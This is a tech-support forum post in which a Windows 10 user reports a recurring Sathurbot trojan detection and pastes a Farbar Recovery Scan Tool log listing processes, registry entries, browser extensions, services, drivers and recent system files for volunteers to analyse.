Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

Infected with SecurityHelper.dll on win 10 pro 32bit


  • Please log in to reply

#1
tenlau

tenlau

    New Member

  • Member
  • Pip
  • 1 posts

Every time I boot computer Eset Smart Security 9 inform me:

Object:

C:\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll

Threat:

a variant of Win32\Sathurbot.R trojan

Information:

cleaned by deleting

 

Seems that is not cleaned very well since it comes on every boot.....

Below are FRST and Addition files.

Thanks in advance for support !

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-10-2016
Ran by admin (administrator) on ACERTRMATE-5744 (13-10-2016 12:00:29)
Running from C:\Users\admin\Downloads
Loaded Profiles: admin (Available Profiles: admin & user & DefaultAppPool)
Platform: Microsoft Windows 10 Pro Version 1607 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
( ) C:\Windows\System32\lmabcoms.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS32.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
() C:\Program Files\Aquila Technology\WOLAgent\WOLAgent.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LMutilps32.exe
() C:\ProgramData\Digi Net Mobile\OnlineUpdate\ouc.exe
() C:\ProgramData\Mobile Partner\OnlineUpdate\ouc.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Acer Incorporated) C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe
(Primax Electronics Ltd.) C:\Windows\System32\ico.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LMworker.exe
() C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\TrayTipAgentE.exe
(PDFConverter.com) C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe
(Skillbrains) C:\Program Files\Skillbrains\lightshot\5.4.0.1\Lightshot.exe
(Google) C:\Program Files\Google\Drive\googledrivesync.exe
(Comfort Software Group) C:\Program Files\FreeAlarmClock\FreeAlarmClock.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(MagicISO, Inc.) C:\Program Files\MagicDisc\MagicDisc.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google) C:\Program Files\Google\Drive\googledrivesync.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkypeHost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer ePower Management\ePowerEvent.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [10082920 2016-10-03] (Realtek Semiconductor)
HKLM\...\Run: [Power Management] => C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe [715368 2011-02-22] (Acer Incorporated)
HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [1097808 2011-04-19] (Dritek System Inc.)
HKLM\...\Run: [Mouse Suite 98 Daemon] => C:\WINDOWS\system32\ICO.EXE [57344 2004-07-14] (Primax Electronics Ltd.)
HKLM\...\Run: [LifeCam] => C:\Program Files\Microsoft LifeCam\LifeExp.exe [135536 2010-12-13] (Microsoft Corporation)
HKLM\...\Run: [RioServer] => C:\Program Files\Whiteboard\Server\Server.exe [2128384 2015-05-11] ()
HKLM\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\TrayTipAgentE.exe [255072 2014-11-18] ()
HKLM\...\Run: [PDF Converter Elite 4.0 Print Dispatcher] => C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe [9052368 2015-08-11] (PDFConverter.com)
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [225944 2016-07-11] ()
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [Xvid] => C:\Program Files\Xvid\CheckUpdate.exe [8192 2011-01-17] ()
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [23375200 2016-07-29] (Google)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [FreeAC] => C:\Program Files\FreeAlarmClock\FreeAlarmClock.exe [3015072 2016-01-19] (Comfort Software Group)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [GoogleChromeAutoLaunch_A822CA3D40D4B8944864CFEA751D8D57] => C:\Program Files\Google\Chrome\Application\chrome.exe [966760 2016-09-25] (Google Inc.)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...0c966feabec1\InprocServer32: [Default-shell32]  ATTENTION
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...A8F59079A8D5}\localserver32:  <==== ATTENTION
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-03-14] ()
Startup: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MagicDisc.lnk [2014-11-12]
ShortcutTarget: MagicDisc.lnk -> C:\Program Files\MagicDisc\MagicDisc.exe (MagicISO, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\KYESCAN.lnk [2014-11-24]
ShortcutTarget: KYESCAN.lnk -> C:\Program Files\ScannerU\KyeScan.exe (KYE SYSTEMS CORP.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WhiteboardServer.lnk [2015-11-02]
ShortcutTarget: WhiteboardServer.lnk -> C:\Program Files\Whiteboard\Server\Server.exe ()
GroupPolicy: Restriction ? <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
Tcpip\..\Interfaces\{14eb4dc7-f99f-4287-88e7-2343b54f9db1}: [DhcpNameServer] 192.168.200.1
Tcpip\..\Interfaces\{3224bbc1-d84b-409d-b253-4909f71b7894}: [NameServer] 193.231.252.1 213.154.124.1
Tcpip\..\Interfaces\{3224bbc1-d84b-409d-b253-4909f71b7894}: [DhcpNameServer] 193.231.252.1 213.154.124.1
Tcpip\..\Interfaces\{53f8ca76-ad85-4fde-8293-d2acdb33f4ce}: [DhcpNameServer] 81.12.128.206 81.12.132.206
Tcpip\..\Interfaces\{f03e07f8-5e73-4422-ac22-023e660167d7}: [DhcpNameServer] 192.168.42.129
 
Internet Explorer:
==================
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/products/plugin/autodl/jinstall-142-windows-i586.cab
DPF: {CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA} hxxp://java.sun.com/products/plugin/autodl/jinstall-142-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0031-ABCDEFFEDCBA} hxxp://java.sun.com/products/plugin/autodl/jinstall-180-windows-i586.cab
 
FireFox:
========
FF DefaultProfile: zbknj5di.default
FF ProfilePath: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default [2016-10-11]
FF Homepage: Mozilla\Firefox\Profiles\zbknj5di.default -> hxxp://www.google.com
FF Extension: (AdBeaver) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\[email protected] [2016-04-25]
FF Extension: (Firefox Hotfix) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\[email protected] [2016-09-13]
FF Extension: (Public Fox) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\{9AA46F4F-4DC7-4c06-97AF-6665170634FE}.xpi [2016-05-18]
FF Extension: (Cookies Manager+) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2016-09-26]
FF Extension: (Adblock Plus) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-09]
FF Plugin: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
FF Plugin: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-23] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-23] (Google Inc.)
FF Plugin: @tracker-software.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-07-28] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-4142771536-1505296934-324239511-1000: @citrixonline.com/appdetectorplugin -> C:\Users\admin\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-12-09] (Citrix Online)
FF Plugin HKU\S-1-5-21-4142771536-1505296934-324239511-1000: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFFICE.DLL [2003-07-14] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2016-07-28] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://home.sweetim.com/?crg=3.1010000&barid={B75E1632-9425-49F7-BC12-6CE69451C061}"
CHR Profile: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default [2016-10-13]
CHR Extension: (Google Slides) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-04]
CHR Extension: (Google Docs) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]
CHR Extension: (Google Drive) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-10]
CHR Extension: (YouTube) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-10]
CHR Extension: (Adblock Plus) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-08-24]
CHR Extension: (Google Search) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-10]
CHR Extension: (Google Sheets) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-04]
CHR Extension: (Avira Browser Safety) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2016-09-21]
CHR Extension: (Google Docs Offline) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Pinterest Save Button) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2016-09-23]
CHR Extension: (RCS & RDS Media Player Extension) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hckkiiidciekfeicdlmmomipcngnfjhl [2016-03-28]
CHR Extension: (Shodan) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jjalcfnidlmpjhdfepjhjbhnhkbgleap [2015-04-07]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2016-01-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (Google Chrome to Phone Extension [DEPRECATED]) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oadboiipflhobonjjffjbfekfjcgkhco [2015-12-10]
CHR Extension: (Gmail) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-06]
CHR Extension: (Chrome Media Router) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-09-22]
CHR HKU\S-1-5-21-4142771536-1505296934-324239511-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 Digi Net Mobile. RunOuc; C:\Program Files\Digi Net Mobile\UpdateDog\ouc.exe [239968 2014-11-14] ()
R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [2171280 2016-10-10] (ESET)
R2 ePowerSvc; C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe [739944 2011-02-22] (Acer Incorporated)
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [271712 2011-03-14] ()
R2 lmab_device; C:\Windows\system32\LMabcoms.exe [593920 2009-12-07] ( ) [File not signed]
S2 Mobile Partner. RunOuc; C:\Program Files\Mobile Partner\UpdateDog\ouc.exe [655712 2014-12-15] ()
S3 rpcapd; C:\Program Files\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [1887272 2016-10-04] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [7534864 2016-08-25] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [271496 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [84928 2016-07-16] (Microsoft Corporation)
R2 WOLAgent; C:\Program Files\Aquila Technology\WOLAgent\WOLAgent.exe [7168 2014-01-28] () [File not signed]
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 athr; C:\WINDOWS\System32\drivers\athwn.sys [3228672 2016-07-16] (Qualcomm Atheros Communications, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [108032 2016-04-25] (Samsung Electronics Co., Ltd.)
R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [206472 2016-10-10] (ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [14976 2016-06-23] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [156320 2016-06-23] (ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [121504 2016-10-10] (ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [162472 2016-06-23] (ESET)
R1 EpfwLWF; C:\WINDOWS\system32\DRIVERS\EpfwLWF.sys [52904 2016-06-23] (ESET)
R0 epfwwfp; C:\WINDOWS\System32\DRIVERS\epfwwfp.sys [71336 2016-06-23] (ESET)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [15968 2014-11-18] ()
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10208 2014-11-18] ()
R3 mcdbus; C:\WINDOWS\System32\drivers\mcdbus.sys [116736 2009-02-24] (MagicISO, Inc.) [File not signed]
S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [56672 2016-10-05] (Avago Technologies)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [62976 2016-07-16] ()
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 USBPcap; C:\WINDOWS\system32\DRIVERS\USBPcap.sys [33016 2015-12-10] (USBPcap)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37912 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [244576 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [100192 2016-07-16] (Microsoft Corporation)
U3 idsvc; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-10-13 12:00 - 2016-10-13 12:00 - 00000000 ____D C:\Users\admin\Downloads\FRST-OlderVersion
2016-10-13 11:43 - 2016-10-13 11:43 - 00000000 ___HD C:\OneDriveTemp
2016-10-13 11:16 - 2016-10-13 11:41 - 00379758 _____ C:\WINDOWS\ntbtlog.txt
2016-10-13 10:02 - 2016-10-13 10:03 - 00000000 ____D C:\Users\admin\Downloads\12697_en(MT4 INDICATOR TO CSV FILE)
2016-10-13 09:26 - 2016-10-05 12:18 - 01283584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-10-13 09:26 - 2016-10-05 12:10 - 00754688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-10-13 09:26 - 2016-10-05 12:08 - 01524224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-10-13 09:26 - 2016-10-05 12:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-10-13 09:26 - 2016-10-05 12:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-10-13 09:26 - 2016-10-05 12:06 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-10-13 09:25 - 2016-10-05 13:10 - 00231776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-10-13 09:25 - 2016-10-05 13:05 - 00892008 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-10-13 09:25 - 2016-10-05 13:05 - 00784576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-10-13 09:25 - 2016-10-05 13:05 - 00099680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2016-10-13 09:25 - 2016-10-05 13:03 - 06015840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-10-13 09:25 - 2016-10-05 13:03 - 01724584 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-10-13 09:25 - 2016-10-05 13:03 - 01072280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-10-13 09:25 - 2016-10-05 13:03 - 00946272 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-10-13 09:25 - 2016-10-05 12:59 - 00949600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-10-13 09:25 - 2016-10-05 12:54 - 01097568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2016-10-13 09:25 - 2016-10-05 12:53 - 00154976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-10-13 09:25 - 2016-10-05 12:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-10-13 09:25 - 2016-10-05 12:50 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-10-13 09:25 - 2016-10-05 12:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-10-13 09:25 - 2016-10-05 12:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-10-13 09:25 - 2016-10-05 12:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 00056672 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-10-13 09:25 - 2016-10-05 12:45 - 00198496 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-10-13 09:25 - 2016-10-05 12:41 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-10-13 09:25 - 2016-10-05 12:40 - 01968480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-10-13 09:25 - 2016-10-05 12:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConfigureExpandedStorage.dll
2016-10-13 09:25 - 2016-10-05 12:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-10-13 09:25 - 2016-10-05 12:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-10-13 09:25 - 2016-10-05 12:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-10-13 09:25 - 2016-10-05 12:27 - 00229888 _____ C:\WINDOWS\system32\wc_storage.dll
2016-10-13 09:25 - 2016-10-05 12:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-10-13 09:25 - 2016-10-05 12:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-10-13 09:25 - 2016-10-05 12:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-10-13 09:25 - 2016-10-05 12:24 - 00113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-10-13 09:25 - 2016-10-05 12:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2016-10-13 09:25 - 2016-10-05 12:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00273920 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogs3D.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-10-13 09:25 - 2016-10-05 12:22 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-10-13 09:25 - 2016-10-05 12:22 - 00325632 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
